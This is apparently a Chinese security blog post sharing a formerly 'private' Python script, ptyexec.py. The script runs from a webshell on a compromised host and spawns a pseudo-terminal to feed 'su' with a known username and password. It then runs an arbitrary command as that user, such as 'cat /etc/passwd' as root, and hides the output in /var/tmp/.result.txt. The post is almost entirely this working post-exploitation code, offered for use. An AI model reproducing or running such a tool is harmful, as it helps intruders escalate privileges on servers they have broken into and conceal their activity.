一个知道帐户名密码在Webshell下执行命令的脚本
- 发表于
- Vulndb
作者:xi4oyu
新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
#!/usr/bin/env python #For God sake, Keep it priv4t3 import sys,os,time,pty def usage(): print "ptyexec.py: fuck the firewall block up" print "By xi4oyu http://www.pentestday.com" print "Usage: ptyexec.py <username> <passwd> <command>" print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"' print 'Result will be located in /var/tmp' sys.exit(0) def fuck_child(pipein): os.dup2(pipein,0) fd = open("/var/tmp/.result.txt","a") os.dup2(fd.fileno(),1) os.dup2(fd.fileno(),2) pty.spawn("/bin/sh") print "GAGA..I'm back,Alt it never be happened" sys.exit(0) def fuck_it_up(user,passwd,command): pipein,pipeout = os.pipe() #Fork the fucking child if os.fork() == 0: fuck_child(pipein) else: time.sleep(2) os.write(pipeout,'su - %s\n'% user) time.sleep(2) os.write(pipeout,'%s\n' % passwd) time.sleep(2) os.write(pipeout,'%s\n' % command) time.sleep(2) os.write(pipeout,'exit\n'); time.sleep(2) sys.exit(0) if __name__ == "__main__": if len(sys.argv) != 4: usage() fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3]) |
原文连接:一个知道帐户名密码在Webshell下执行命令的脚本
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。